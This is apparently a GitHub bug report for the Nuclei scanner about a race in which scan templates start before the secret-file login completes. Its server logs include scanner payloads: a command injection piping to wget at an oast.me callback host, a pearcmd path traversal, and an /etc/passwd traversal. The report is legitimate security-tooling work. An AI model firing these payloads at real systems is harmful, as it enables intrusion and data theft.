[BUG] Authenticated scanning starts executing templates before the secret-file template finishes #6592
Description
Is there an existing issue for this?
- I have searched the existing issues.
Current Behavior
When running an authenticated scan using a secret file nuclei starts executing templates immediately, before the secret file finishes, causing some requests to not be authenticated.
command that I'm running:
nuclei3.4.dev -secret-file django-login.yaml -target http://localhost:8000/ -v
When I print the server logs I see all requests before the secret file finishes as unauthenticated (See AnyonymousUser):
15:32:48.443 | WARNING | django.request - Not Found: /wp-content/plugins/flash-album-gallery/readme.txt
15:32:48.446 | WARNING | django.server - "GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1" 404 23770
15:32:48.450 | WARNING | django.request - Not Found: /wp-content/plugins/skysa-official/readme.txt
AnonymousUser
AnonymousUser
15:32:48.491 | WARNING | django.server - "GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1" 404 23750
AnonymousUser
AnonymousUser
AnonymousUser
AnonymousUser
AnonymousUser
AnonymousUser
15:32:48.554 | WARNING | django.request - Not Found: /login-x.php
AnonymousUser
15:32:48.641 | WARNING | django.server - "GET /login-x.php HTTP/1.1" 404 23619
AnonymousUser
AnonymousUser
AnonymousUser
AnonymousUser
AnonymousUser
15:32:48.946 | WARNING | django.request - Not Found: /guest_auth/guestIsUp.php
15:32:48.950 | WARNING | django.server - "POST /guest_auth/guestIsUp.php HTTP/1.1" 404 23672
15:32:48.950 | INFO | django.server - code 400, message Bad HTTP/0.9 request type ('mac=1&ip=127.0.0.1|wget')
15:32:48.950 | WARNING | django.server - "mac=1&ip=127.0.0.1|wget d46bv7aqko33m6d2te7g4b8fu93o1zo7w.oast.me" 400 -
AnonymousUser
15:32:48.994 | WARNING | django.request - Not Found: /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx
15:32:48.996 | WARNING | django.server - "POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1" 404 23884
AnonymousUser
15:32:49.290 | INFO | django.server - "POST /accounts/login/ HTTP/1.1" 302 0
<engbot@example.com>
15:32:49.476 | WARNING | django.request - Not Found: /wp-content/plugins/featurific-for-wordpress/readme.txt
15:32:49.482 | WARNING | django.server - "GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1" 404 23791
<engbot@example.com>
15:32:49.592 | WARNING | django.request - Not Found: /wp-content/plugins/clickdesk-live-support-chat/readme.txt
15:32:49.599 | WARNING | django.server - "GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1" 404 23803
15:32:49.655 | WARNING | django.request - Not Found: /lcms/index.php
15:32:49.657 | WARNING | django.server - "POST /lcms/index.php HTTP/1.1" 404 23632
<engbot@example.com>
15:32:49.683 | WARNING | django.security.csrf - Forbidden (CSRF cookie not set.): /
15:32:49.690 | WARNING | django.request - Not Found: /wp-content/plugins/all-in-one-event-calendar/readme.txt
15:32:49.694 | INFO | django.server - "GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+sBV3dCd1eI.log HTTP/1.1" 302 0
15:32:49.695 | WARNING | django.server - "GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1" 404 23795
<engbot@example.com>
Only once POST /accounts/login/ finishes do the requests start being authenticated (see engbot@example.com) instead of Anonymous user.
Expected Behavior
I would expect nuclei to first run the secret-file and only after it finishes start running the other templates. This was the behavior on Nuclei 3.4.7, before the authenticated scan regression in 3.4.8.
This is how the server logs look when I run the same code on 3.4.7:
nuclei3.4.7 -secret-file django-login.yaml -target http://localhost:8000/ -v
AnonymousUser
15:50:23.744 | INFO | django.server - "GET /accounts/login/ HTTP/1.1" 200 25860
AnonymousUser
15:50:23.931 | INFO | django.server - "POST /accounts/login/ HTTP/1.1" 302 0
<engbot@example.com>
15:50:25.028 | WARNING | django.request - Not Found: /export/classroom-course-statistics
<engbot@example.com>
<engbot@example.com>
15:50:25.031 | WARNING | django.server - "GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1" 404 23797
<engbot@example.com>
15:50:25.058 | WARNING | django.request - Not Found: /cgi-bin/rpc
15:50:25.059 | WARNING | django.server - "POST /cgi-bin/rpc HTTP/1.1" 404 23618
<engbot@example.com>
<engbot@example.com>
<engbot@example.com>
15:50:25.364 | WARNING | django.request - Not Found: /zentao/user-login.html
15:50:25.365 | WARNING | django.server - "POST /zentao/user-login.html HTTP/1.1" 404 23663
15:50:25.370 | WARNING | django.request - Not Found: /general/index/UploadFile.php
15:50:25.371 | WARNING | django.request - Not Found: /webadm/
Steps To Reproduce
- Run nuclei with a secret-file
nuclei -secret-file django-login.yaml -target http://localhost:8000/ -v
Relevant log output
Environment
- OS: Macos
- Nuclei: 3.4.10 53af79a39290c86857f433bb2f40e4567982fed0
- Go: go version go1.24.2 darwin/arm64Anything else?
No response